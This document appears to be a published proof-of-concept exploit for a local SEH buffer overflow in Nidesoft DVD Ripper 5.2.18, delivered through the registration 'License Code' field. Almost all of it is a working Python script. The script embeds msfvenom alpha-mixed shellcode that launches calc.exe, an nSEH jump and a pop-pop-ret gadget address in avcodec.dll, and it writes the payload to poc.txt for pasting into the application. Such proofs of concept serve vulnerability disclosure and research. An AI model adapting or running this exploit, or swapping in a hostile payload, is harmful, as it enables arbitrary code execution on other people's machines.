Nidesoft DVD Ripper 5.2.18 Local Buffer Overflow

`# Exploit Title: Nidesoft DVD Ripper 5.2.18 - Local Buffer Overflow (SEH)  
# Date: 2020-07-26  
# Author: Felipe Winsnes  
# Software Link: https://nidesoft-dvd-ripper.softonic.com/  
# Version: 5.2.18  
# Tested on: Windows 7 (x86)  
  
# Blog: https://whitecr0wz.github.io/  
  
# Proof of Concept:  
# 1.- Run the python script, it will create the file "poc.txt".  
# 2.- Copy the content of the new file "poc.txt" to clipboard  
# 3.- Open the application.  
# 4.- Paste the clipboard into the "License Code" parameter within registration.  
# 5.- Profit.  
  
import struct  
  
# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread -b "\x00\x0a\x0d"   
# Payload size: 448 bytes  
  
buf = b""  
buf += b"\x89\xe5\xda\xda\xd9\x75\xf4\x5f\x57\x59\x49\x49\x49"  
buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"  
buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"  
buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"  
buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x6d\x38\x4c"  
buf += b"\x42\x33\x30\x73\x30\x37\x70\x55\x30\x6c\x49\x6b\x55"  
buf += b"\x35\x61\x49\x50\x32\x44\x6e\x6b\x42\x70\x66\x50\x6c"  
buf += b"\x4b\x56\x32\x74\x4c\x6c\x4b\x42\x72\x75\x44\x6c\x4b"  
buf += b"\x54\x32\x31\x38\x74\x4f\x58\x37\x51\x5a\x31\x36\x55"  
buf += b"\x61\x6b\x4f\x4c\x6c\x77\x4c\x33\x51\x53\x4c\x35\x52"  
buf += b"\x76\x4c\x51\x30\x4f\x31\x78\x4f\x74\x4d\x67\x71\x38"  
buf += b"\x47\x68\x62\x4b\x42\x46\x32\x30\x57\x6c\x4b\x71\x42"  
buf += b"\x62\x30\x6e\x6b\x61\x5a\x57\x4c\x6c\x4b\x70\x4c\x54"  
buf += b"\x51\x63\x48\x49\x73\x63\x78\x43\x31\x4e\x31\x43\x61"  
buf += b"\x6c\x4b\x50\x59\x31\x30\x63\x31\x59\x43\x4e\x6b\x77"  
buf += b"\x39\x44\x58\x79\x73\x77\x4a\x62\x69\x4c\x4b\x66\x54"  
buf += b"\x6c\x4b\x47\x71\x78\x56\x70\x31\x39\x6f\x4c\x6c\x6f"  
buf += b"\x31\x58\x4f\x34\x4d\x46\x61\x4b\x77\x46\x58\x4d\x30"  
buf += b"\x53\x45\x5a\x56\x45\x53\x73\x4d\x39\x68\x67\x4b\x73"  
buf += b"\x4d\x51\x34\x74\x35\x79\x74\x53\x68\x6e\x6b\x33\x68"  
buf += b"\x67\x54\x47\x71\x69\x43\x71\x76\x4e\x6b\x74\x4c\x30"  
buf += b"\x4b\x4c\x4b\x73\x68\x47\x6c\x67\x71\x48\x53\x4c\x4b"  
buf += b"\x54\x44\x4c\x4b\x36\x61\x68\x50\x6b\x39\x61\x54\x77"  
buf += b"\x54\x76\x44\x63\x6b\x63\x6b\x31\x71\x32\x79\x72\x7a"  
buf += b"\x52\x71\x39\x6f\x4b\x50\x31\x4f\x61\x4f\x73\x6a\x6e"  
buf += b"\x6b\x65\x42\x48\x6b\x6e\x6d\x61\x4d\x43\x5a\x45\x51"  
buf += b"\x4c\x4d\x6e\x65\x6f\x42\x57\x70\x67\x70\x43\x30\x30"  
buf += b"\x50\x45\x38\x35\x61\x6c\x4b\x72\x4f\x6f\x77\x39\x6f"  
buf += b"\x79\x45\x6f\x4b\x6b\x50\x65\x4d\x67\x5a\x74\x4a\x65"  
buf += b"\x38\x6d\x76\x4f\x65\x6d\x6d\x4f\x6d\x49\x6f\x39\x45"  
buf += b"\x67\x4c\x67\x76\x73\x4c\x47\x7a\x4f\x70\x4b\x4b\x69"  
buf += b"\x70\x32\x55\x47\x75\x6d\x6b\x30\x47\x44\x53\x63\x42"  
buf += b"\x62\x4f\x42\x4a\x75\x50\x43\x63\x6b\x4f\x4e\x35\x71"  
buf += b"\x73\x31\x71\x30\x6c\x55\x33\x54\x6e\x62\x45\x74\x38"  
buf += b"\x53\x55\x65\x50\x41\x41"  
  
nseh = "\xEB\x11\x41\x41"  
seh = struct.pack("<I", 0x6678336D) # 0x6678336d : pop ebx # pop esi # ret | asciiprint,ascii,alphanum,lowernum {PAGE_EXECUTE_WRITECOPY} [avcodec.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Nidesoft Studio\Nidesoft DVD Ripper 5\avcodec.dll)  
  
buffer = "A" * 6008 + nseh + seh + "A" * 11 + buf + "\xff" * 200  
  
f = open ("poc.txt", "w")  
f.write(buffer)  
f.close()  
`